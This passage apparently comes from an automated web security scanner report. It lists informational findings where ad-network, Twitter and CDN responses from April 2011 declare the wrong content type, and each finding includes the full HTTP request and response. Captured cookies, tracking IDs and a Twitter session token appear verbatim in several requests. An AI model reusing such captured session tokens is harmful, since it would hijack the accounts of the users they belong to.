Request

GET /getInPageJSProcess.aspx?a=51&b=13741&cid=634302783474292484&isif=t&rurld=tag.admeld.com&sl=true&dvp=http%3A//tag.admeld.com/ad/iframe/3/foxnews/300x250/ros%3Ft%3D1302543075863%26tz%3D300%26hu%3D%26ht%3Djs%26hp%3D0%26url%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html%26refer%3Dhttp%253A%252F%252Fwww.foxnews.com%252Fpolitics%252Findex.html&rurl= HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302543075863&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=a53875b5-a877-4a03-ad1a-e28c70299475

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ucap=sl=1; domain=.a1.interclick.com; expires=Thu, 21-Apr-2011 17:33:13 GMT; path=/
Set-Cookie: FC_51=113861=17621725:1; domain=.a1.interclick.com; expires=Tue, 12-Apr-2011 17:33:13 GMT; path=/
Set-Cookie: IFC=n=1&w13741=1&a113861=1&e=634382119938708309; domain=.a1.interclick.com; expires=Tue, 12-Apr-2011 17:33:13 GMT; path=/
Set-Cookie: Aqprep_Banner300X250=113861=634381255938868325:13741; domain=.a1.interclick.com; expires=Sun, 10-Jul-2011 17:33:13 GMT; path=/
Set-Cookie: Li=1=734237&30=734237; domain=.a1.interclick.com; expires=Wed, 11-May-2011 17:33:13 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Mon, 11 Apr 2011 17:33:13 GMT
Content-Length: 4834

document.write(unescape("%3Cscript%20language%3D%22javascript%22%20type%3D%22text/javascript%22%3E%0D%0Afunction%20regNameSpace%28ns%29%7Btry%7Bvar%20nsP%20%3D%20ns.split%28%22.%22%29%3Bvar%20r%20%3D%
...[SNIP]...
17.4. http://a2.twimg.com/profile_images/1133407227/ugh_normal.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a2.twimg.com
Path:   /profile_images/1133407227/ugh_normal.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/1133407227/ugh_normal.jpg HTTP/1.1
Host: a2.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=252460800
Date: Sat, 09 Apr 2011 12:34:16 GMT
Content-Length: 10373
Content-Type: image/jpeg
ETag: "68e8165c32683cc70bca9927fce45aa6"
Expires: Fri, 15 Mar 2019 23:46:07 GMT
Last-Modified: Tue, 28 Sep 2010 23:46:35 GMT
Server: AmazonS3
X-Amz-Cf-Id: 1c0d96d6d31b59b6a258a12d0082593e357dea2ccc8e450f38c973197646a5ea7b910f81b8008e05,ee786b1155c4f0f09c4c15a0ea970557f6995b20df6b0bcd78e15dea5cd4dad11b738c0fab5b22cf
x-amz-id-2: slLvcjilASvDXMpj3gsHoYljKhMtD1tATaHMwiHCktcy1+G9HYiuyf5AVHVFYpNA
x-amz-request-id: 8FF713C349D7E74F
X-Cache: Miss from cloudfront
Connection: keep-alive

.PNG
.
...IHDR...0...0......`n.....gAMA....B.O....LiCCPicc..x..YgPT[...#..&..s..9I...4..6..
.`B....H.L.....(...TPQQT.(H.....&..T....V....{.:U..>........+@dT....T...G.?..... .L....89.........*Rbb"
...[SNIP]...
17.5. http://a2.twimg.com/profile_images/313254997/carlson_normal.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a2.twimg.com
Path:   /profile_images/313254997/carlson_normal.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/313254997/carlson_normal.gif HTTP/1.1
Host: a2.twimg.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=252460800
Content-Length: 4898
Content-Type: image/gif
ETag: "9011b4464aaba980610232df01b3c168"
Expires: Mon, 25 Mar 2019 19:41:16 GMT
Last-Modified: Tue, 14 Jul 2009 15:36:02 GMT
Server: AmazonS3
X-Amz-Cf-Id: e5d42ad633db59d5304c67b16ed9ed8c0136d1bf5a363b33223961bb0f829666f57a0a2c0405edba,fa17a5930c1b3dd7e7c80f3669e63a20905f674d80bcdcf71c52a38f30fa040c2555a662f421686d
x-amz-id-2: ROUANG4uTOoTVHN3FDCEEuvoYJHTTtXpTNhCu6uuzs6JKf158nsFaHFo6GZNxHf5
x-amz-request-id: 8154FA1225F0B313
X-Cache: Miss from cloudfront
Date: Sat, 09 Apr 2011 12:34:16 GMT
Connection: keep-alive

.PNG
.
...IHDR...0...0......`n....    pHYs...H...H.F.k>...    vpAg...0...0....W....IDATX.=...%.q.#.L9..;..&.E.dS........xgx...K.G....z.....i..!..%..X.......o.c......U:.L. ...EF..~.w...    ..w.SDy*....A....
...[SNIP]...
17.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/b%3B233906192%3B0-0%3B1%3B22676449%3B21-88/31%3B34860823/34878678/1%3B%3B%7Eokv%3D%3Bpos%3Dstocksearch%3Bfnc%3Dad%3Bsz%3D88x31%3B%7Eaopt%3D2/1/8b/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/fnc/root/stocksearch;pos=stocksearch;fnc=ad;sz=88x31;ord=781297988?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d97d7972eae5; i_1=33:967:555:0:0:43204:1301796810:L|46:572:479:0:0:43204:1301796759:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Mon, 11 Apr 2011 16:21:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1722

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
17.7. http://adadvisor.net/adscores/g.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adadvisor.net
Path:   /adscores/g.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /adscores/g.js?sid=9212076087 HTTP/1.1
Host: adadvisor.net
Proxy-Connection: keep-alive
Referer: http://cdn.interclick.com/ticolscr.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 17:31:23 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 38
Content-Type: application/javascript

TargusCallback("000", "", "", "", "");
17.8. http://admeld.lucidmedia.com/clicksense/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /clicksense/admeld/match?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain
Date: Mon, 11 Apr 2011 16:31:19 GMT
Expires: Mon, 11 Apr 2011 16:31:19 GMT
P3P: CP=NOI ADM DEV CUR
Server: Apache-Coyote/1.1
Set-Cookie: 2=2x5NmZC-t7Z; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:19 GMT; Path=/
Content-Length: 164
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3406242120278446565"/>');
17.9. http://ads.adap.tv/beacons  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /beacons?callback=jsonp1302352256751 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-6740737079467195442__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 579

jsonp1302352256751({
   "beacons":["http://tags.bluekai.com/site/2174", "http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pixel.quantserve.com/seg/r;a=p-573scDfDoUH6o;redirec
...[SNIP]...
17.10. http://adserver.veruta.com/cookiematch.fcgi  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserver.veruta.com
Path:   /cookiematch.fcgi

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: adserver.veruta.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 11 Apr 2011 16:31:18 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
P3P: policyref="http://www.veruta.com/w3c/p3p.xml",CP="NOI DSP COR NID"
Pragma: no-cache
Content-Length: 146

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=567&external_user_id=0&expiration=1305131478"/>');
17.11. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/1551-48114-17349-5

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /ad/js/1551-48114-17349-5?mpt=532355&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3ae6/3/0/%2a/r%3B239410357%3B0-0%3B0%3B46850814%3B4307-300/250%3B35536982/35554800/1%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%7Eokv%3D%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.100%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D100%3Bdc%3Dw%3Bbtg%3D%3B%7Eaopt%3D3/1/e4/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=809237955976; mojo3=13754:22869

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=1551:17349/13754:22869; expires=Thu, 11-Apr-2013 4:27:58 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 525
Date: Mon, 11 Apr 2011 16:21:22 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ae6/3/0/*/r;239410357;0-0;0;46850814;4307-300/250;35536982/35554800/1;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.1
...[SNIP]...
17.12. http://amch.questionmarket.com/adscgen/st.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /adscgen/st.php?survey_num=880609&site=54787049&code=38651720&randnum=531339 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros?t=1302538875852&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=725047-14-2; ES=724925-!f8"M-ac

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:22 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 1
Content-Type: text/html

;
17.13. http://api.kickapps.com/rest/comments/62976  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.kickapps.com
Path:   /rest/comments/62976

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /rest/comments/62976?pgNum=1&pageSize=1&url=http%3A//www.wptz.com/news/27483035/detail.html&t=0SD0svP/Zk58tfSWXNJ/thuqOKP802x3&mediaType=emedia&userId=0&callback=IBSYS.hrst.commentCount.onKACommentData HTTP/1.1
Host: api.kickapps.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Sat, 09 Apr 2011 12:31:08 GMT
Server: Noelios-Restlet-Engine/1.0..11
Content-Language: *
Content-Type: text/plain;charset=UTF-8
Content-Length: 126

IBSYS.hrst.commentCount.onKACommentData({"totSize":0,"payload_type":"json","status":"1","results":[],"error":"","totPages":0})
17.14. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/WCAX_DAN/lists/wcaxweather/statuses.json

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /1/WCAX_DAN/lists/wcaxweather/statuses.json?callback=TWTR.Widget.receiveCallback_1&since_id=56489775208730624&refresh=true&include_rts=true&clientsource=TWITTERINC_WIDGET&1302352245110=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18196
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1301787648483845; guest_id=130178764848732008; __utmz=43838368.1301796978.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.745502295.1301796978.1301796978.1301796978.1; __utmv=43838368.lang%3A%20en; original_referer=ZLhHHTiegr%2B46kQmsSCcdY9PeWer8JTdK72MdNqjnztsHEcgBgUBxCkZolWwyxPA; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLxHPjovAToHaWQiJWI5ZDY2MTEyNzEzYzI5%250AMWVkOGM5ZDNiMDU4OWUxNGM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--3fca1ebd2ebf0edc779f5abbed3918788126099a

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:31:23 GMT
Server: hi
Status: 200 OK
X-Transaction: 1302352283-73608-19038
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
Last-Modified: Sat, 09 Apr 2011 12:31:23 GMT
X-RateLimit-Remaining: 104
X-Runtime: 0.01322
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1302355850
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCLxHPjovASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJWI5%250AZDY2MTEyNzEzYzI5MWVkOGM5ZDNiMDU4OWUxNGM0--68456826b804732decc9adcd874144bfe8409462; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 34

TWTR.Widget.receiveCallback_1([]);
17.15. http://bh.contextweb.com/bh/sync/admeld  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/sync/admeld

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros?t=1302539475029&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.97552ab6-5d98-11e0-8434-0025900a8ffe.1|535039.bf0d68cb-2449-4e5d-8b20-461d8ec850c3.0|535461.4608069584519221037.1|531292.CG-00000001131071922.1; C2W4=3x1f-Ps9Yhy3ydw-2vbkHY4Vj-8mDoMxIgKRGAlDwhIQOU6J7b35caw; cr=111|5|-8588990505152210454|1; V=wOEFmQuIafIS

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
Set-Cookie: V=wOEFmQuIafIS; Domain=.contextweb.com; Expires=Thu, 05-Apr-2012 16:31:19 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: -1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 162
Date: Mon, 11 Apr 2011 16:31:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=8&external_user_id=wOEFmQuIafIS&_segment=2%7CwOEFmQuIafIS%7C"/>');
17.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2326412&PluID=0&w=728&h=90&ord=[timestamp]&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/wn.loc.wcax/news;sz=728x90;wnsz=41;tile=3;wncc=News;wnpt=S;wnpc=story;wncp=WCAX;wncid=14408230;wnad85=wcax;wnad44=wcax;wnad41=wcax;wnad43=wcax;wnad52=wcax;wnad22=wcax;wnad1=wcax;wnad20=wcax;wnad49=wcax;apptype=platform;env=production;ord=26798968?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=73786992-c1ac-4ae0-ab08-95828826c2953Hu01g; A3=iVGCazDb02Hn00002h6GXaxsD0czK00000idb7axqo02Hn00000iryraz5F09Fl0000aidb8axqo02Hn00000h6H6axsD0czK00000izcpayfZ0bnA00001iGeHaztg0bBg00001hZiFayN607xf00000hRzPazYC07tg00001iVEMazDb02Hn00001iVF7aztg02Hn00001iKJmayXi07Nz00001ieWcaxuC035P00000hGtnaxCA0bKd00001gy4faxT809wy0000ki9lAaxCA0bKd00003hRzOazYy07tg00001iznKax6T0bI400001iRc1az5S0cba00001hUeBaxLG0cdw00001iBoWax1n06UE00001iGxeaxBP07pd00001i9lUaxwP0bKd00001htT2ax2d07aw00001iwN7az7I0czK0000chVoJawTt0bKd00004hUeyaxqd0cdw00001imVBayg20cEt00001b2Xeayce04m400000hGteaxw50bKd00001hVo4axCA0bKd00003hGtDaxxL0bKd00005iBlzaxwY06UE00001iwZ+azjI0czK00005gx4UayXj09wy00002gy4daxKP09wy00002ipIYayg10cEt00001iB.Uaxqo02Hn00005iznWax7U0bI400001; B3=97pN0000000001t.8Tjz0000000000tX8KY10000000000t.8dnC0000000002u28P920000000001tV8HLo0000000005tY8Qvs0000000003tY95u+0000000001tU6Yf50000000001tU8Jbw0000000004tV93Np0000000001tW8Swk0000000005tX8nf80000000000tX8B100000000001tY9ajg0000000001u08nf90000000000tX8ZIR0000000002tV8V.x0000000001tZ92de0000000002tW8Jbt0000000003tY8QDY0000000001u193Nl0000000001tX8SBq0000000001tZ8B0.0000000001tX8TZe000000000au09br40000000001u19br30000000001u15J3v0000000000tZ8Qvv0000000001tX8B120000000005tX9br20000000002u184hv0000000002t.8Ykb0000000001tZ8WhH0000000001tV9c2I000000000hu086Y60000000001tW8Swi0000000000tX95uB0000000001tX8Swj0000000000tX851k000000000mtY

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=idb7axqo02Hn00000h6GXaxsD0czK00000iVGCazDb02Hn00002iryraz5F09Fl0000aiGeHaztg0bBg00001izcpayfZ0bnA00001h6H6axsD0czK00000idb8axqo02Hn00000hZiFayN607xf00000hGtnaxCA0bKd00001ieWcaxuC035P00000iKJmayXi07Nz00001iVF7aztg02Hn00001iVEMazDb02Hn00001hRzPazYC07tg00001hRzOazYy07tg00001i9lAaxCA0bKd00003gy4faxT809wy0000kiznKax6T0bI400001iBoWax1n06UE00001hUeBaxLG0cdw00001iRc1az5S0cba00001htT2ax2d07aw00001i9lUaxwP0bKd00001iGxeaxBP07pd00001iuodaAyr09Fl00001imVBayg20cEt00001hUeyaxqd0cdw00001iwN7az7I0czK0000ciwZ+azjI0czK00005iBlzaxwY06UE00001hGtDaxxL0bKd00005hVo4axCA0bKd00003hGteaxw50bKd00001b2Xeayce04m400000gy4daxKP09wy00002gx4UayXj09wy00002ipIYayg10cEt00001iB.Uaxqo02Hn00005iznWax7U0bI400001; expires=Fri, 08-Jul-2011 08:59:31 GMT; domain=.serving-sys.com; path=/
